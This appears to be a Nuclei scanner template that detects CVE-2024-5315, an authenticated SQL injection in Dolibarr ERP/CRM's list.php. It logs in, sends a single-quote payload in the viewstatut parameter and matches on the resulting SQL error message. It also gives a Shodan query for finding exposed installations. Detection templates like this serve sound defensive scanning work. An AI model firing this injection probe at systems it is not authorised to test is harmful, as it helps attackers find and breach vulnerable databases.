id: CVE-2024-5315 info: name: Dolibarr ERP CMS `list.php` - SQL Injection author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | These vulnerabilities could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in the database through the parameters viewstatut in /dolibarr/commande/list.php reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-5315 - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dolibarrs-erp-cms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-5315 cwe-id: CWE-89 epss-score: 0.5717 epss-percentile: 0.98182 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Dolibarr" product: dolibarr_erp\\/crm vendor: dolibarr tags: cve,cve2024,dolibarr,erp,sqli,authenticated,vuln variables: username: "{{username}}" password: "{{password}}" http: - raw: - | POST /htdocs/index.php?mainmenu=home HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded loginfunction=loginfunction&username={{username}}&password={{password}} - | GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - You have an error in your SQL syntax - type: word part: header_1 words: - 'Set-Cookie: DOLSESSID_' - type: word part: body_1 words: - SuperAdmin # digest: 4a0a0047304502203f45aa2c372c30952f5bfbae0aa91efa7a06bff37a9483e1b53dbdd176e5e669022100b87b632b126e3fc475d6c10f07e98cd7cb8c48868ba4c3762bae1ceea5f76353:922c64590222798bb761d5b6d8e72950